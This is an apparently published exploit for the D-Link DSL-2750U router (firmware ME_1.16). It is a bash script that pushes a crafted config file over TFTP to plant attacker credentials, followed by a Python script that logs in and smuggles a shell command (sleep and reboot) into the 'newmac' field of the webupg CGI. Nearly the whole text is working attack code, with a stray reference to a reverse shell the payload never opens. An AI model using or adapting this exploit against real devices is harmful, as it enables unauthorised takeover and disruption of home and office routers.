Dlink DSL2750U Command Injection

`# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection  
# Date: 17-06-2021  
# Exploit Author: Mohammed Hadi (HadiMed)  
# Vendor Homepage: https://me.dlink.com/consumer  
# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16  
# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R*  
# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6)   
  
###   
  
#!/bin/bash  
  
# Exploit by HadiMed   
  
# Takes advantage of the tftp server that accepts the cfg file blindly   
echo -ne "\n"  
echo "Exploiting Dlink DSL-2750u version 1.6"  
echo -ne "\n\n"  
  
# Sending the payload   
echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1  
echo -ne "\n"  
  
echo "File uploaded Successfully"  
echo "Waiting for router to restart"  
  
sleep 180 # approximate time for router to restart   
  
python3 exploit.py  
  
###  
  
import requests   
  
# HTTP request looks like this   
'''  
POST /cgi-bin/webproc HTTP/1.1  
Host: 192.168.1.1  
Content-Length: 175  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.1.1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.1.1/cgi-bin/webproc  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91  
Connection: close  
  
getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91   
'''  
  
# 1 Getting a session id   
  
# password and username crafted by me on the cfg.xml file   
  
username = "pwned"  
password= "pwned"  
  
  
# acually the client set the sessionid in condition that the password and username are correct  
  
Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef"  
Contentty="application/x-www-form-urlencoded"  
Referer="http://192.168.1.1/cgi-bin/webproc"  
Contentlen="175"   
  
# Sending first request to set our session id   
response = requests.post("http://192.168.1.1/cgi-bin/webproc",  
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }  
,   
data={ "getpage":"html/index.html",  
"errorpage":"html/main.html",  
"var:menu" : "setup",  
"var:page":"wizard",  
"obj-action":"auth",  
":username":username,  
":password":password,  
":action":"login",  
":sessionid":"deadbeef"  
}  
)  
  
  
Referer = "http://192.168.1.1/cgi-bin/webupg"  
  
name = "mac"  
cmd = "1;sleep${IFS}10;reboot;"  
  
Contentlen = str(len(name+cmd)+10)  
  
if response.status_code==302:  
print("got sessionid=deadbeef !\n waiting for the reverse shell ...")   
  
# access cgi-bin/webupg  
try :  
response = requests.post("http://192.168.1.1/cgi-bin/webupg",  
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }  
,data = {"name":name , "newmac":cmd} , timeout=0.0000000001  
  
)  
  
except requests.exceptions.Timeout :  
  
print("done router will restart in 20 sec")   
  
print("Device restarted!")  
`